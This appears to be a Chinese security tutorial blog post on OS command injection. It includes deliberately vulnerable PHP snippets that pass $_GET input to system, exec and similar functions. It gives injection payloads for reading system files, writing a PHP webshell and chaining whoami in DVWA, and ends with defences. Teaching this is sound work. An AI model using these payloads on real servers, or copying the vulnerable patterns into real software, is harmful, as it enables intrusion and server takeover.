本文详细介绍了OS命令注入漏洞的原理,起因及危害,包括如何通过系统调用函数如`system`, `exec`等执行恶意命令。漏洞可能导致权限提升、文件读写和服务器控制。防御措施包括参数过滤、函数禁用和输入转义。同时,举例展示了DVWA的低、中、高三种安全级别下的漏洞利用情况。
os命令注入漏洞(command)
1.大致介绍:
如果我们开发的应用,特别是一些企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令的函数。应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入情况下,就会造成命令执行漏洞。
2.形成原因:
–用户输入作为拼接
–没有足够的过滤
3.漏洞危害:
–继承web服务器程序权限(web用户权限),去执行系统命令
–继承web服务器权限,读写文件
–反弹shell
–控制整个网站
–控制整个服务器
4.函数(比较典型的)
—system:能够将字符串作为os 命令执行,自带输出功能
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
system($str);
}
?>
—exec:能够将字符串作为os 命令执行,需要输出执行结果(输出需要输入print)
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
print exec($str);
}
?>
—shell_exec:和上边的一样
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
print shell_exec($str);
}
?>
—passthru:和上边的一样 自带输出
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
passthru($str);
}
?>
—popen:和上边一样 但是需要导入一个新的文件中 不会返回结果 会返回一个文件指针
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
popen($str);
}
?>
在上边的url地址框上末尾加上>>1.txt (意思是将结果导入1.txt文件中)
—反引号``:和上边一样
简单例子:
<?php
if($_GET['cmd']){
$str=$_GET['cmd'];
print `$str`;
}
?>
5.漏洞利用
—查看系统文件:?cmd=type c:\windows\system32\drivers\etc\hosts
—显示当前路径:?cmd=cd
写文件:?cmd=echo" <?php phpinfo();?>">D:\php\www\shell.php(页面没有报错说明 文件写入成功).可以直接访问shelll.php查看)
6.防御方法:
—尽量减少命令执行函数的使用,并在disable_functions 中禁用
----在进入命令执行的函数或方法之前,对参数进行过滤
—参数的值尽量使用引号包裹,并在拼接前调用adds lashes进行转义
6.DVWA实例:
----low:
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.1&&whoami
127.0.0.0.1|| whoami (这是或的意思当前边出错时就会执行后边的命令)
----medium:
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.0.1|| whoami
----high:
127.0.0.1|whoami
扫一扫
5366
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
